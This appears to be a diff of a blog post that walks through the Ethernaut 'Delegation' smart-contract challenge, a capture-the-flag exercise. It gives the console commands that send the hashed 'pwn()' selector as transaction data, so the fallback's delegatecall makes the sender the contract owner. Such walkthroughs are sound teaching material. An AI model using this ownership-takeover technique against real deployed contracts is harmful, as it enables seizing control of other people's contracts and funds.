bajaj-aditya/my-blogs-hashnode/clfcpe3mr000709jldcvt230q.md

 * but the storage of the Delegation contract is used.

-* Updates `owner == msg.sender` according to the `pwn()` function in the delegation contract.
+* Updates `owner = msg.sender(us)` according to the `pwn()` function in the delegation contract.

 ### Solution

-* Create a new level instance and open up console.
+* Create a new level instance and open up the console.

 * ```solidity
       var attack = web3.utils.keccak256("pwn()") //saves hashed pwn() in attack.
       //we require the hashed version of pwn() to pass it as msg.data.
     ```

 * ```solidity
       contract.sendTransaction({data: attack}) //sending a transaction with msg.data as attack which will trigger the pwn() function.
       //Since, there is no function to accept the transaction, it will trigger the fallback function which will delegate it and....Ah Shit, here we go again.
     ```

 * ```solidity
       await contract.owner() //check whether you are the owner.
     ```

 * Submit Instance.